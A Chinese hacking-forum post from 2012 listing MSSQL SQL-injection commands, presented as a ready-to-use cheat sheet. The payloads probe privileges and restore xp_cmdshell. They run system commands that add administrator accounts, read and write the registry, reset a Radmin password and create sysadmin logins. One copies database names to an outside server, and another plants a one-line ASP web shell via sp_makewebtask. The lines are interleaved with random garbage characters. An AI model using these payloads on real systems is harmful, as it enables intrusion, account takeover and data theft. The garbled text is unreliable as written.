找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2058|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的
/ i4 ~8 U& {( S/ o# I2 iand 1=(Select IS_MEMBER('db_owner'))
5 q: I4 k9 t) h; FAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--* X- }' Q' T! c" A5 @) P5 |$ _" H0 x

5 S% {/ W3 s* M9 @* ?9 A//检测是否有读取某数据库的权限- N. Z% C( I4 W4 g/ _, {! ^2 p
and 1= (Select HAS_DBACCESS('master'))
. b! x4 ~; m  @2 C- \2 zAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --" k: L) J, U+ K- J. F
- d. p- @! S$ M6 E0 l

2 G7 S9 n3 f2 [  ?% v1 B, R) A数字类型
/ S3 R5 C+ j$ G, H2 sand char(124)%2Buser%2Bchar(124)=0
* w, _& U' m* B) o  n  [5 y8 Y" S  c& s* t4 O* g
字符类型
  X" P( o- b* x/ M0 h' and char(124)%2Buser%2Bchar(124)=0 and ''='
0 O/ @: k0 q# Y; A8 f4 g; J8 [9 N) X$ K  w1 J
搜索类型% e0 W! r2 n" K  g6 V
' and char(124)%2Buser%2Bchar(124)=0 and '%'='/ i- M  T, N- r
' l7 `4 `8 X+ b4 Z
爆用户名- i' H; U* c0 |' ^) y$ s! o
and user>0
2 ?/ i1 Z+ Q3 Q" v' and user>0 and ''='
2 H, U" s( n- A3 Y2 _6 e: C; M: y8 G( Y8 A* s6 w' c* p8 T% Z% I
检测是否为SA权限
9 X! `- K/ [! Nand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
2 }- L/ R9 G3 y5 ?* IAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
- n: _+ P% `4 S5 x9 L+ V4 `* ^0 Z" z5 T! u. Z; G
检测是不是MSSQL数据库7 P2 \) y+ W4 a, b  I$ S
and exists (select * from sysobjects);--
( L7 ^% G7 Q2 P& \" U
% y4 Q8 u' ]: x3 h( e9 ?9 C检测是否支持多行/ m- H2 u9 ^; l
;declare @d int;--
! v1 R  F1 M4 N! l6 _; j0 ^( x3 H" J, x7 O' E: p" L# o
恢复 xp_cmdshell
  ^2 j( K- v# \6 E) e( v  `" ?9 [;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--' x) _; D0 l: D) V4 ?- T# H+ c8 B6 _
+ }# ?/ ^2 ?. B. s; x& G/ B
) k2 S6 ]% y8 ~% e4 O) k& }
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')  p" z0 M6 F% Q* H
# o3 `# }- W! l" b& X% F' ?
//-----------------------! ~. j' Q: h! L3 n$ j) f
//       执行命令2 p6 H$ y& \! R2 ]3 [
//-----------------------6 i" }' Y% Z+ L
首先开启沙盘模式:
- M+ G9 k( j  P9 Q/ f6 h7 Wexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
) ~( `( _; m  g8 L/ E, _* U6 U/ H- S+ x1 T& z* d
然后利用jet.oledb执行系统命令
  i1 b; U$ m2 \, o. I+ \select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')! V& ]9 m, z/ m. A: |3 W8 O

- c* i, s4 U; E2 c  A% M执行命令
5 H8 ~- J1 d) _;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
) Y( d: x& Z3 ^8 h& ~
' @& T9 r: O8 o% V* tEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'& \0 ~) ?9 z4 B. W

/ w: a" g! |5 d% J判断xp_cmdshell扩展存储过程是否存在:
& l( s' Y4 y) ]0 u8 ?$ ?  E6 L  Ohttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')3 _$ b1 _9 Z/ `4 Q

* M' ]$ o. g1 A# z8 d写注册表
. x2 N1 k9 Q, W* Sexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
* P+ h4 g6 V$ b
3 M3 y8 X* M# g2 aREG_SZ. p  Q' k  P# y2 z5 Y
$ P! c  N9 u: S6 a' }
读注册表( ]6 D$ o# {* |0 |+ M9 I. B; Z; z  F
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
7 c0 v/ [& [0 {0 [5 K7 a4 c- O5 V/ N* Q
读取目录内容$ Z# _! |# l+ G; f0 F
exec master..xp_dirtree 'c:\winnt\system32\',1,14 `0 Z8 ^! q+ l. x0 a" Q7 P
( ?" k9 u1 B8 }: H9 l4 B( U* P
- q' z+ i4 J+ F6 g" h; X
数据库备份
8 f5 Y- E3 z) J' N, m9 ^backup database pubs to disk = 'c:\123.bak'
& S1 M: q1 O: ?3 y9 s* j) k6 k. Y# m' `! {  Z3 F
//爆出长度, w( ?0 T7 f/ N3 e* g( c
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
9 C' r4 S) e) B! L: b% o  [# ?8 U& b6 g, c  W6 d6 e

. l, o9 J( ~. f/ B7 l# g2 q% b5 ^! p& z, V" N# }' y7 P4 K1 c
更改sa口令方法:用sql综合利用工具连接后,执行命令:
% A, z* p# \! D, Q7 m) v2 c5 cexec sp_password NULL,'新密码','sa'. p7 I' v% x/ m5 [2 F6 F8 }# r
2 D& {. R9 c) F9 z9 J) }" I
添加和删除一个SA权限的用户test:) q) e: D+ i% g1 ]4 x
exec master.dbo.sp_addlogin test,9530772
+ v  e7 \5 d* p9 E$ Y+ t  Sexec master.dbo.sp_addsrvrolemember test,sysadmin- ~! _+ I1 R1 N2 K4 v
; {! L- C# l; f2 E' ]1 j
删除扩展存储过过程xp_cmdshell的语句:' [" {, w$ ^5 U
exec sp_dropextendedproc 'xp_cmdshell'
4 d, m: }/ \3 c, h; o4 }7 k! L9 E8 j- N; h& v
添加扩展存储过过程+ C  _3 _$ q4 K- i* |
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
  N' s6 q/ F9 H' j" |' @7 ]% W8 nGRANT exec On xp_proxiedadata TO public# |2 U8 A7 r( a, n$ i" z8 q
4 C2 o! q! ^7 a: Y) k4 t1 `

# c4 L; ~8 a1 E) T% v停掉或激活某个服务。9 T/ j% q+ F; k! d, }5 p& k

) x8 D( ?3 U& D9 Gexec master..xp_servicecontrol 'stop','schedule'% R% H7 u1 }3 U9 ~7 f# ?- h
exec master..xp_servicecontrol 'start','schedule'
/ Y5 N: k# [) D4 B7 u- L! Q
+ N  Z$ y5 b7 G5 a8 R- Edbo.xp_subdirs
% L$ i# ^) m8 b  J1 J! a+ b6 y9 G" Y) ?! M' Y* X- z3 J
只列某个目录下的子目录。
% U2 _1 ]% s& W% \7 U& \xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'3 C/ b+ r! r! M+ b9 p8 |

/ \9 f) C5 _9 V% Jdbo.xp_makecab, K1 E" B& \( n* N; \( }) [

. m1 n$ C( a7 b2 V( \- M. {将目标多个档案压缩到某个目标档案之内。, j" R) e0 n( v* C( P! [
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。, {+ P* u9 j. Y2 Y4 g* |2 L! N

5 w4 L: N* L$ S0 C! Rdbo.xp_makecab
- o$ c. N4 Z2 `! N'c:\test.cab','mszip',1,
) C" Q8 m' @  J'C:\Inetpub\wwwroot\SQLInject\login.asp',
$ Q6 S+ `# c- I3 o1 o'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'4 Y/ z9 I, t& z4 K
; Y" c3 O  N6 ?! R9 y( V
xp_terminate_process3 D" Y& O* p. y; G

3 f% P  ?# e2 B. ]1 @8 ]3 O停掉某个执行中的程序,但赋予的参数是 Process ID。$ O9 R/ `5 Y& z% J8 o
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID, b+ ~3 E+ \$ p9 G4 d
; Z/ N: \. T" P& h% O
xp_terminate_process 24847 f" N& O: d6 v' {' x3 C
% B1 e* z/ N% X
xp_unpackcab3 H  O/ A7 s$ k7 o8 B! L
! a: A( m& {7 }; a1 b0 }
解开压缩档。
! e' V% Q& M; G/ X7 n$ O6 A0 y6 T1 m
0 H! R! o; P7 yxp_unpackcab 'c:\test.cab','c:\temp',19 X1 Y+ O) O; T+ \5 f  W

8 H0 {# ]9 C! C" v+ t/ Z& \
' t0 ?" J1 }* Q. G1 M- c# i) t某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234& ~& u  h, ]/ c1 g

$ r) B% u- G+ q( i& ]create database lcx;* ]: S, M2 m4 I" q: P
Create TABLE ku(name nvarchar(256) null);. D7 r( l3 U2 |6 m& b" i& o2 w
Create TABLE biao(id int NULL,name nvarchar(256) null);6 P8 J! C% ?( X
; H" p) o, B% m- ]' `% Q5 k
//得到数据库名1 q2 y6 U2 W0 S5 h! D. d9 g) O! U
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
* x: v0 `8 x( e( j0 ^4 ?5 @2 c$ X
5 H; L8 Z* _: g& D( Q) C& h8 N
//在Master中创建表,看看权限怎样
6 D/ \0 Z! X! {Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--* a) W6 n6 N' f! d( B4 V, `

) T' ?) c8 [" D7 ~7 ~" Q用 sp_makewebtask直接在web目录里写入一句话马:' s$ G4 d! S* _7 ]' N. W" ^
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--0 H% X( P4 Z& a( W, t) P, N  G) l
* x* w0 t0 v2 e
//更新表内容# S4 |" d) q4 }* N, U/ A, A8 v
Update films SET kind = 'Dramatic' Where id = 123
" D1 M) F% L" n) y
4 A. ]3 h; F" t* t/ l* ~: p//删除内容  i3 W0 I/ L: f) d
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表